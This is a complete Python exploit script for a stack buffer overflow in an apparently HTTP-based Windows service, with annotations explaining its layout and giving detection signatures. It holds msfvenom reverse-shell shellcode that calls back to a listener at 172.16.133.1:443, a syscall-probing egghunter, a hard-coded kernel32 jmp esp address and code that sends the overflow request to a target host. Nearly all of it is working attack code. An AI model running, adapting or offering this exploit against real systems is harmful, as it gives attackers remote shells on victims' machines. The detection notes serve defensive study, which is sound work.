#!/usr/bin/env python
# $Id: exploit.py,v 1.0 2018/07/06 09:48:45 dhn Exp $

import socket

# msfvenom --platform windows -p windows/shell_reverse_tcp \
#   LHOST=172.16.133.1 LPORT=443 -b "\x00\x0a\x0d" \
#   -e x86/alpha_mixed -f py
#
# Second-stage payload that the egghunter below searches memory for.
# Per the command above it is a reverse-shell stub calling back to
# 172.16.133.1:443, encoded with x86/alpha_mixed so that it contains none
# of 0x00/0x0a/0x0d -- presumably because those bytes would cut short the
# HTTP request line that carries it.  After the short non-alphanumeric
# prefix every byte is printable ([0-9A-Za-z]); from a detection
# standpoint that long printable run immediately after the egg tag in
# the request body is a usable signature.
shellcode =  (
	"\x89\xe6\xd9\xe1\xd9\x76\xf4\x59\x49\x49\x49\x49\x49"
	"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37"
	"\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
	"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
	"\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x39\x78\x4e\x62"
	"\x63\x30\x33\x30\x77\x70\x45\x30\x6d\x59\x59\x75\x66"
	"\x51\x59\x50\x45\x34\x6c\x4b\x72\x70\x44\x70\x6e\x6b"
	"\x73\x62\x36\x6c\x6c\x4b\x63\x62\x46\x74\x6c\x4b\x70"
	"\x72\x35\x78\x54\x4f\x4d\x67\x61\x5a\x36\x46\x36\x51"
	"\x59\x6f\x4e\x4c\x57\x4c\x33\x51\x61\x6c\x46\x62\x56"
	"\x4c\x65\x70\x4a\x61\x4a\x6f\x46\x6d\x33\x31\x59\x57"
	"\x6a\x42\x79\x62\x36\x32\x73\x67\x4c\x4b\x76\x32\x46"
	"\x70\x6e\x6b\x43\x7a\x67\x4c\x4e\x6b\x72\x6c\x37\x61"
	"\x50\x78\x78\x63\x77\x38\x55\x51\x4e\x31\x50\x51\x4e"
	"\x6b\x53\x69\x47\x50\x37\x71\x7a\x73\x6c\x4b\x62\x69"
	"\x46\x78\x48\x63\x45\x6a\x62\x69\x4c\x4b\x67\x44\x4e"
	"\x6b\x73\x31\x4b\x66\x44\x71\x59\x6f\x6e\x4c\x79\x51"
	"\x48\x4f\x76\x6d\x76\x61\x4a\x67\x57\x48\x4b\x50\x42"
	"\x55\x6c\x36\x65\x53\x33\x4d\x5a\x58\x47\x4b\x33\x4d"
	"\x64\x64\x53\x45\x4b\x54\x72\x78\x4e\x6b\x72\x78\x55"
	"\x74\x77\x71\x68\x53\x55\x36\x6c\x4b\x76\x6c\x42\x6b"
	"\x4c\x4b\x61\x48\x65\x4c\x67\x71\x49\x43\x4e\x6b\x76"
	"\x64\x4e\x6b\x35\x51\x4e\x30\x6c\x49\x42\x64\x61\x34"
	"\x31\x34\x33\x6b\x63\x6b\x31\x71\x70\x59\x51\x4a\x76"
	"\x31\x39\x6f\x6d\x30\x61\x4f\x31\x4f\x30\x5a\x4c\x4b"
	"\x54\x52\x6a\x4b\x4c\x4d\x43\x6d\x72\x48\x74\x73\x66"
	"\x52\x43\x30\x47\x70\x61\x78\x62\x57\x51\x63\x44\x72"
	"\x71\x4f\x66\x34\x52\x48\x32\x6c\x74\x37\x47\x56\x74"
	"\x47\x39\x6f\x59\x45\x48\x38\x4e\x70\x77\x71\x63\x30"
	"\x57\x70\x51\x39\x7a\x64\x43\x64\x76\x30\x52\x48\x44"
	"\x70\x6f\x70\x50\x6b\x55\x50\x6b\x4f\x4b\x65\x66\x30"
	"\x56\x70\x50\x50\x30\x50\x51\x50\x52\x70\x47\x30\x76"
	"\x30\x63\x58\x58\x6a\x76\x6f\x79\x4f\x49\x70\x6b\x4f"
	"\x78\x55\x6c\x57\x51\x7a\x56\x65\x53\x58\x6e\x4c\x32"
	"\x30\x4f\x75\x45\x51\x50\x68\x75\x52\x75\x50\x36\x61"
	"\x6d\x6b\x6b\x39\x78\x66\x51\x7a\x52\x30\x62\x76\x71"
	"\x47\x52\x48\x4f\x69\x4e\x45\x44\x34\x65\x31\x4b\x4f"
	"\x69\x45\x6d\x55\x4f\x30\x71\x64\x66\x6c\x59\x6f\x70"
	"\x4e\x44\x48\x70\x75\x6a\x4c\x62\x48\x78\x70\x4e\x55"
	"\x49\x32\x76\x36\x69\x6f\x68\x55\x31\x78\x73\x53\x32"
	"\x4d\x31\x74\x67\x70\x4b\x39\x4d\x33\x61\x47\x32\x77"
	"\x31\x47\x55\x61\x4a\x56\x30\x6a\x57\x62\x42\x79\x71"
	"\x46\x4d\x32\x49\x6d\x55\x36\x69\x57\x50\x44\x55\x74"
	"\x77\x4c\x67\x71\x56\x61\x6c\x4d\x63\x74\x46\x44\x64"
	"\x50\x69\x56\x77\x70\x61\x54\x63\x64\x30\x50\x76\x36"
	"\x66\x36\x50\x56\x67\x36\x32\x76\x50\x4e\x66\x36\x31"
	"\x46\x50\x53\x66\x36\x42\x48\x70\x79\x58\x4c\x55\x6f"
	"\x4e\x66\x69\x6f\x7a\x75\x4c\x49\x59\x70\x52\x6e\x71"
	"\x46\x77\x36\x49\x6f\x70\x30\x62\x48\x74\x48\x6b\x37"
	"\x75\x4d\x75\x30\x6b\x4f\x6e\x35\x6d\x6b\x7a\x50\x6e"
	"\x55\x59\x32\x56\x36\x33\x58\x49\x36\x4c\x55\x4d\x6d"
	"\x6f\x6d\x79\x6f\x39\x45\x75\x6c\x53\x36\x73\x4c\x67"
	"\x7a\x6f\x70\x79\x6b\x59\x70\x30\x75\x33\x35\x4f\x4b"
	"\x42\x67\x57\x63\x64\x32\x50\x6f\x42\x4a\x47\x70\x62"
	"\x73\x59\x6f\x4a\x75\x41\x41"
)

# egg: EVIL
# The tag is the 4-byte string "LIVE" written twice.  The egghunter below
# compares against the constant 0x4556494c, which is "LIVE" in little-endian
# byte order (and spells "EVIL" when read as a big-endian number, hence the
# comment above).  Two consecutive matches are required, so the 8-byte
# literal "LIVELIVE" is what marks the start of the shellcode in memory.
egg_signature = "LIVELIVE"

# egghunter: 32 bytes
#
# Syscall-probing egghunter.  It walks memory one page at a time: the
# or/inc pair rounds edx up to the next page boundary, the int 0x2e call
# with eax = 2 is used only to learn whether that page is readable
# (al == 5 is the low byte of an access-violation status, so the page is
# skipped), and on a readable page it compares the dword at [edi] with the
# tag twice in a row before jumping to the byte after the second tag.
# The branch targets in the comments (0x1000, 0x1005) are disassembler
# offsets relative to a 0x1000 base: "je 0x1000" is the top of the loop
# and "jne 0x1005" is the "inc edx" that advances the scan pointer.
# Detection note: the int 0x2e / cmp al,5 / scasd / scasd byte sequence is
# the well-known signature of this hunter and is easy to match on the wire.
egghunter = (
	"\x66\x81\xca\xff\x0f"          # or    dx, 0xfff
	"\x42"                          # inc   edx
	"\x52"                          # push  edx
	"\x6a\x02"                      # push  2
	"\x58"                          # pop   eax
	"\xcd\x2e"                      # int   0x2e
	"\x3c\x05"                      # cmp   al, 5
	"\x5a"                          # pop   edx
	"\x74\xef"                      # je    0x1000
	"\xb8\x4c\x49\x56\x45"          # mov   eax, 0x4556494c
	"\x8b\xfa"                      # mov   edi, edx
	"\xaf"                          # scasd eax, dword ptr es:[edi]
	"\x75\xea"                      # jne   0x1005
	"\xaf"                          # scasd eax, dword ptr es:[edi]
	"\x75\xe7"                      # jne   0x1005
	"\xff\xe7"                      # jmp   edi
)

if __name__ == "__main__":
	# Request-line buffer layout, 258 bytes in total: 186 bytes of filler
	# up to the overwritten return address, the 4-byte address itself, an
	# 8-byte NOP sled, the 32-byte egghunter, then 0xcc fill out to 258.
	padding = "A" * 186
	# Written as the big-endian value 0x7C86467B and reversed into
	# little-endian byte order.  The comment attributes it to kernel32.dll,
	# so the exploit is presumably pinned to one specific (non-ASLR) build
	# of that module.
	jmp_esp = "\x7C\x86\x46\x7B"[::-1] # kernel32.dll

	payload = padding
	payload += jmp_esp
	payload += "\x90" * 8 + egghunter
	# 0xcc is int3: if execution ever lands in the tail fill it traps
	# rather than running garbage.
	payload += "\xcc" * (258 - 186 - 4 - 8 - len(egghunter))

	# The overflow rides in the GET path; the egg tag plus the real
	# shellcode are placed on a separate "header" line so that they end up
	# elsewhere in process memory for the egghunter to locate.  Detection
	# note: a GET whose path is ~258 bytes of raw, mostly non-printable
	# data, followed by a line beginning "LIVELIVE".
	buf = "GET /" + payload + " HTTP/1.1\r\n"
	buf += "Host: 172.16.133.131\r\n"
	buf += "User-Agent: Mozilla/5.0\r\n"
	buf += egg_signature + shellcode + "\r\n"
	buf += "\r\n"

	# Fire-and-forget: nothing is read back from the target, so the only
	# sign of success is a connection on the listener named in the
	# msfvenom comment at the top of the file.
	print("[+] Sending the payload!")
	# Appears to assume Python 2 str-as-bytes semantics: buf is a str of
	# raw 8-bit characters passed directly to send().  Target host and
	# port are hard-coded.
	expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
	expl.connect(("172.16.133.129", 3000))
	expl.send(buf)
	expl.close()
